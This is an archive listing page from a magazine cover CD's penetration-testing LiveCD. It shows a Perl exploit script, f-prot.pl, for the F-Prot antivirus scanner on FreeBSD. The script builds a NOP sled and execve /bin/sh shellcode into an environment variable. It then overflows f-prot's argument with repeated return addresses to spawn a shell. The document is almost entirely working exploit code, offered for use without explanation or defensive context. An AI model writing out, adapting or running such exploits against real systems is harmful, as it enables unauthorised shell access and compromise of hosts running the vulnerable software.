home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / antivirus / fprot / f-prot.pl < prev   
Perl Script  |  2005-02-12  |  817b  |  26 lines

  1. #!/usr/bin/perl
  2. # knud
  3. $len = 1000;
  4. $ret = 0xbfbffb7f; # on my 4.7-RELEASE
  5. $nop = "\x90";
  6. $offset = 0;
  7. $shellcode ="\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56". #freebsd 29bytes
  8.             "\xb0\x3b\x50\xcd\x80\xe8\xed\xff\xff\xff\x2f". #execve /bin/sh 
  9.             "\x62\x69\x6e\x2f\x73\x68\x23";                 #zillionATsafemode.org
  10.  
  11. if (@ARGV == 1) {
  12.     $offset = $ARGV[0];
  13. }
  14. for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
  15.     $buffer .= $nop;
  16. }
  17. $buffer .= $shellcode;
  18. print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");
  19. $new_ret = pack('l', ($ret + $offset));
  20. for ($i += length($shellcode); $i < $len; $i += 4) {
  21.     $buffer .= $new_ret;
  22. }
  23. local($ENV{'EGG'}) = $buffer; 
  24. $cakeman = "ABC" . $new_ret x 247 ; 
  25. exec("f-prot $cakeman");</PRE></BODY></HTML>
  26.